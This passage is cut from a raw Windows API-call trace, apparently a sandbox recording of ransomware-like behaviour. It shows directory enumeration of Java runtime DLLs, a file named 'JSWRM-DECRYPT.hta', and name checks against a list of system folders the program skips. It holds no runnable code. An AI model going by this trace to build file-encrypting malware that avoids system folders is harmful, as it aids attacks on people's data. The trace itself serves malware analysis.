CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="deployJava1.dll", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="deployJava1.dll", lpUsedDefaultChar=0x0) returned 15 [0069.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0069.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0069.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0069.464] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x200a746b, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x200a746b, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x200f36c0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x232f46, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0069.464] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0069.465] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0069.465] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0069.465] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0069.465] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0069.465] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0069.465] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0069.465] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0069.465] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0069.465] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0069.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0069.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0069.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0069.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0069.465] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x11a640, dwReserved0=0x60002, dwReserved1=0x232f46, cFileName="npdeployJava1.dll", cAlternateFileName="NPDEPL~1.DLL")) returned 1 [0069.465] lstrcmpiW (lpString1="npdeployJava1.dll", lpString2=".") returned 1 [0069.465] lstrcmpiW (lpString1="npdeployJava1.dll", lpString2="..") returned 1 [0069.465] lstrcmpiW (lpString1="npdeployJava1.dll", lpString2="...") returned 1 [0069.465] lstrcmpiW (lpString1="npdeployJava1.dll", lpString2="windows") returned -1 [0069.465] lstrcmpiW (lpString1="npdeployJava1.dll", lpString2="recovery") returned -1 [0069.465] lstrcmpiW (lpString1="npdeployJava1.dll", lpString2="perflogs") returned -1 [0069.466] lstrcmpiW (lpString1="npdeployJava1.dll", lpString2="documents and settings") returned 1 [0069.466] lstrcmpiW (lpString1="npdeployJava1.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.466] lstrcmpiW (lpString1="npdeployJava1.dll", lpString2="system volume information") returned -1 [0069.466] lstrcmpiW (lpString1="npdeployJava1.dll", lpString2="msocache") returned 1 [0069.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="npdeployJava1.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="npdeployJava1.dll", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="npdeployJava1.dll", lpUsedDefaultChar=0x0) returned 17 [0069.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="npdeployJava1.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="npdeployJava1.dll", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="npdeployJava1.dll", lpUsedDefaultChar=0x0) returned 17 [0069.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0069.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0069.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.466] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x11a640, dwReserved0=0x60002, dwReserved1=0x232f46, cFileName="npdeployJava1.dll", cAlternateFileName="NPDEPL~1.DLL")) returned 0 [0069.467] FindClose (in: hFindFile=0x232000 | out: hFindFile=0x232000) returned 1 [0069.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0069.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0069.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0069.467] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7440, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="dt_shmem.dll", cAlternateFileName="")) returned 1 [0069.467] lstrcmpiW (lpString1="dt_shmem.dll", lpString2=".") returned 1 [0069.467] lstrcmpiW (lpString1="dt_shmem.dll", lpString2="..") returned 1 [0069.467] lstrcmpiW (lpString1="dt_shmem.dll", lpString2="...") returned 1 [0069.467] lstrcmpiW (lpString1="dt_shmem.dll", lpString2="windows") returned -1 [0069.467] lstrcmpiW (lpString1="dt_shmem.dll", lpString2="recovery") returned -1 [0069.467] lstrcmpiW (lpString1="dt_shmem.dll", lpString2="perflogs") returned -1 [0069.467] lstrcmpiW (lpString1="dt_shmem.dll", lpString2="documents and settings") returned 1 [0069.467] lstrcmpiW (lpString1="dt_shmem.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.467] lstrcmpiW (lpString1="dt_shmem.dll", lpString2="system volume information") returned -1 [0069.467] lstrcmpiW (lpString1="dt_shmem.dll", lpString2="msocache") returned -1 [0069.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0069.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dt_shmem.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dt_shmem.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dt_shmem.dll", lpUsedDefaultChar=0x0) returned 12 [0069.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0069.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0069.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dt_shmem.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dt_shmem.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dt_shmem.dll", lpUsedDefaultChar=0x0) returned 12 [0069.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0069.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0069.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.468] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x6040, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="dt_socket.dll", cAlternateFileName="DT_SOC~1.DLL")) returned 1 [0069.468] lstrcmpiW (lpString1="dt_socket.dll", lpString2=".") returned 1 [0069.468] lstrcmpiW (lpString1="dt_socket.dll", lpString2="..") returned 1 [0069.468] lstrcmpiW (lpString1="dt_socket.dll", lpString2="...") returned 1 [0069.468] lstrcmpiW (lpString1="dt_socket.dll", lpString2="windows") returned -1 [0069.468] lstrcmpiW (lpString1="dt_socket.dll", lpString2="recovery") returned -1 [0069.468] lstrcmpiW (lpString1="dt_socket.dll", lpString2="perflogs") returned -1 [0069.468] lstrcmpiW (lpString1="dt_socket.dll", lpString2="documents and settings") returned 1 [0069.468] lstrcmpiW (lpString1="dt_socket.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.468] lstrcmpiW (lpString1="dt_socket.dll", lpString2="system volume information") returned -1 [0069.468] lstrcmpiW (lpString1="dt_socket.dll", lpString2="msocache") returned -1 [0069.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dt_socket.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dt_socket.dll", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dt_socket.dll", lpUsedDefaultChar=0x0) returned 13 [0069.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dt_socket.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dt_socket.dll", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dt_socket.dll", lpUsedDefaultChar=0x0) returned 13 [0069.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0069.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0069.468] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x21440, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="eula.dll", cAlternateFileName="")) returned 1 [0069.468] lstrcmpiW (lpString1="eula.dll", lpString2=".") returned 1 [0069.468] lstrcmpiW (lpString1="eula.dll", lpString2="..") returned 1 [0069.468] lstrcmpiW (lpString1="eula.dll", lpString2="...") returned 1 [0069.468] lstrcmpiW (lpString1="eula.dll", lpString2="windows") returned -1 [0069.468] lstrcmpiW (lpString1="eula.dll", lpString2="recovery") returned -1 [0069.469] lstrcmpiW (lpString1="eula.dll", lpString2="perflogs") returned -1 [0069.469] lstrcmpiW (lpString1="eula.dll", lpString2="documents and settings") returned 1 [0069.469] lstrcmpiW (lpString1="eula.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.469] lstrcmpiW (lpString1="eula.dll", lpString2="system volume information") returned -1 [0069.469] lstrcmpiW (lpString1="eula.dll", lpString2="msocache") returned -1 [0069.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0069.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.dll", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.dll", lpUsedDefaultChar=0x0) returned 8 [0069.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0069.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0069.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.dll", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.dll", lpUsedDefaultChar=0x0) returned 8 [0069.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0069.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0069.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0069.469] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x43040, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="fontmanager.dll", cAlternateFileName="FONTMA~1.DLL")) returned 1 [0069.469] lstrcmpiW (lpString1="fontmanager.dll", lpString2=".") returned 1 [0069.469] lstrcmpiW (lpString1="fontmanager.dll", lpString2="..") returned 1 [0069.469] lstrcmpiW (lpString1="fontmanager.dll", lpString2="...") returned 1 [0069.469] lstrcmpiW (lpString1="fontmanager.dll", lpString2="windows") returned -1 [0069.469] lstrcmpiW (lpString1="fontmanager.dll", lpString2="recovery") returned -1 [0069.470] lstrcmpiW (lpString1="fontmanager.dll", lpString2="perflogs") returned -1 [0069.470] lstrcmpiW (lpString1="fontmanager.dll", lpString2="documents and settings") returned 1 [0069.470] lstrcmpiW (lpString1="fontmanager.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.470] lstrcmpiW (lpString1="fontmanager.dll", lpString2="system volume information") returned -1 [0069.470] lstrcmpiW (lpString1="fontmanager.dll", lpString2="msocache") returned -1 [0069.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0069.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fontmanager.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0069.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fontmanager.dll", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontmanager.dll", lpUsedDefaultChar=0x0) returned 15 [0069.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0069.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0069.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fontmanager.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0069.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fontmanager.dll", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontmanager.dll", lpUsedDefaultChar=0x0) returned 15 [0069.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0069.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0069.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0069.470] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2da40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="fxplugins.dll", cAlternateFileName="FXPLUG~1.DLL")) returned 1 [0069.470] lstrcmpiW (lpString1="fxplugins.dll", lpString2=".") returned 1 [0069.470] lstrcmpiW (lpString1="fxplugins.dll", lpString2="..") returned 1 [0069.470] lstrcmpiW (lpString1="fxplugins.dll", lpString2="...") returned 1 [0069.470] lstrcmpiW (lpString1="fxplugins.dll", lpString2="windows") returned -1 [0069.470] lstrcmpiW (lpString1="fxplugins.dll", lpString2="recovery") returned -1 [0069.470] lstrcmpiW (lpString1="fxplugins.dll", lpString2="perflogs") returned -1 [0069.470] lstrcmpiW (lpString1="fxplugins.dll", lpString2="documents and settings") returned 1 [0069.470] lstrcmpiW (lpString1="fxplugins.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.470] lstrcmpiW (lpString1="fxplugins.dll", lpString2="system volume information") returned -1 [0069.470] lstrcmpiW (lpString1="fxplugins.dll", lpString2="msocache") returned -1 [0069.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fxplugins.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fxplugins.dll", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fxplugins.dll", lpUsedDefaultChar=0x0) returned 13 [0069.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0069.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fxplugins.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fxplugins.dll", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fxplugins.dll", lpUsedDefaultChar=0x0) returned 13 [0069.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0069.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0069.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0069.471] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x40e40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="glass.dll", cAlternateFileName="")) returned 1 [0069.471] lstrcmpiW (lpString1="glass.dll", lpString2=".") returned 1 [0069.471] lstrcmpiW (lpString1="glass.dll", lpString2="..") returned 1 [0069.471] lstrcmpiW (lpString1="glass.dll", lpString2="...") returned 1 [0069.471] lstrcmpiW (lpString1="glass.dll", lpString2="windows") returned -1 [0069.471] lstrcmpiW (lpString1="glass.dll", lpString2="recovery") returned -1 [0069.471] lstrcmpiW (lpString1="glass.dll", lpString2="perflogs") returned -1 [0069.471] lstrcmpiW (lpString1="glass.dll", lpString2="documents and settings") returned 1 [0069.471] lstrcmpiW (lpString1="glass.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.471] lstrcmpiW (lpString1="glass.dll", lpString2="system volume information") returned -1 [0069.471] lstrcmpiW (lpString1="glass.dll", lpString2="msocache") returned -1 [0069.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="glass.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0069.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="glass.dll", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="glass.dll", 